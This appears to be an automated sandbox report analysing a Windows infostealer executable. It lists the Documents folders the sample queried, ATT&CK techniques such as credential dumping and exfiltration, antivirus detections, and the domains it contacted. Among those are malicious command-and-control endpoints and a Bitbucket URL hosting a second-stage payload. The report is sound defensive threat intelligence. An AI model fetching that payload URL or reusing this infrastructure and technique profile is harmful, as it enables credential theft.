                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: LP4a6BowQN.exe PID: 7624, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: LP4a6BowQN.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                2
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services41
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                2
                Process Injection
                LSASS Memory751
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                LP4a6BowQN.exe58%ReversingLabsWin32.Infostealer.Tinba
                LP4a6BowQN.exe58%VirustotalBrowse
                LP4a6BowQN.exe100%AviraTR/Crypt.TPM.Gen
                LP4a6BowQN.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                16.182.101.249
                truefalse
                  high
                  bitbucket.org
                  185.166.143.49
                  truefalse
                    high
                    cuddlyready.xyz
                    104.21.32.96
                    truetrue
                      unknown
                      bbuseruploads.s3.amazonaws.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        sendypaster.xyztrue
                          unknown
                          steppriflej.xyztrue
                            unknown
                            smash-boiling.cyoutrue
                              unknown
                              https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefalse
                                high
                                supporse-comment.cyoutrue
                                  unknown
                                  hosue-billowy.cyoutrue
                                    unknown
                                    cuddlyready.xyztrue
                                      unknown
                                      ripe-blade.cyoutrue
                                        unknown
                                        greywe-snotty.cyoutrue
                                          unknown
                                          https://cuddlyready.xyz/apitrue
                                            unknown
                                            pollution-raker.cyoutrue
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0LP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/chrome_newtabLP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/ac/?q=LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://cuddlyready.xyz/piLP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://cuddlyready.xyz/apimLP4a6BowQN.exe, 00000000.00000003.1449986604.00000000054A1000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450463340.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450513722.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449717243.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449804953.00000000054A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://cuddlyready.xyz/LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449717243.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1505886935.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1399489133.0000000000B82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeXLP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B82000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cuddlyready.xyz/aLP4a6BowQN.exe, 00000000.00000003.1425120047.000000000549E000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1424948648.0000000005499000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netLP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exedLP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cuddlyready.xyz/dLP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://remote-app-switcher.prod-east.frontend.public.atl-paas.netLP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://x1.c.lencr.org/0LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://x1.i.lencr.org/0LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0LP4a6BowQN.exe, 00000000.00000002.1984216252.00000000006FA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cuddlyready.xyz/tLP4a6BowQN.exe, 00000000.00000003.1506045565.0000000000C13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://aui-cdn.atlassian.com/LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.mozilla.org/products/firefoxgro.allLP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atlLP4a6BowQN.exefalse
                                                                                                unknown
                                                                                                https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netLP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoLP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.microHLP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506334302.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://web-security-reports.services.atlassian.com/csp-report/bb-websiteLP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                high
                                                                                                                http://ocsp.rootca1.amazontrust.com0:LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorLP4a6BowQN.exe, 00000000.00000002.1994446587.0000000005AF9000.00000002.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662614324.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662371385.0000000005557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.ecosia.org/newtab/LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://dz8aopenkvv6s.cloudfront.netLP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://dz8aopenkvv6s.cloudfront.LP4a6BowQN.exefalse
                                                                                                                            unknown
                                                                                                                            https://ac.ecosia.org/autocomplete?q=LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://cuddlyready.xyz/7LP4a6BowQN.exe, 00000000.00000003.1520684768.0000000000C13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://cuddlyready.xyz:443/apiLP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgLP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netLP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://cdn.cookielaw.org/LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9eLP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgLP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://remote-app-switcher.stg-east.frontend.public.atl-paas.netLP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://bbuseruploads.s3.amazonaws.com/LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctaLP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        16.182.101.249
                                                                                                                                                        s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                        unknownunknownfalse
                                                                                                                                                        185.166.143.49
                                                                                                                                                        bitbucket.orgGermany
                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                        104.21.32.96
                                                                                                                                                        cuddlyready.xyzUnited States
                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                        Analysis ID:1579735
                                                                                                                                                        Start date and time:2024-12-23 08:18:02 +01:00
                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 6m 3s
